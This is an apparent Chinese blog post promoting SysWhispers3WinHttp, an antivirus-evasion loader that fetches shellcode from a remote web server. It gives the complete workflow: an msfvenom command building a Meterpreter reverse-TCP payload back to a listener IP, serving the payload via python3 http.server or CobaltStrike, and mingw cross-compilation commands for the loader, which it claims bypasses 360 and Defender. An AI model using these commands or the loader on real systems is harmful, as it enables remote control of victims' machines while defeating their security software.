0
点赞
收藏
分享

微信扫一扫

免杀工具 -- SysWhispers3WinHttp

是波波呀 2023-06-15 阅读 67

0x01 工具介绍

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。

0x02 安装与使用

1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.110 lport=4444 -f raw -o beacon.bin

2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)

python3 -m http.server

3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译

x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -O1

ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译

i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp

4、效果展示

免杀工具 -- SysWhispers3WinHttp_Shell

免杀工具 -- SysWhispers3WinHttp_IP_02

免杀工具 -- SysWhispers3WinHttp_IP_03

举报

相关推荐

免杀-一句话的免杀

编码直接免杀

Python shellcode免杀

免杀实战-EDR对抗

免杀原理与实践

121-宏免杀

免杀技术以及木马处理

0 条评论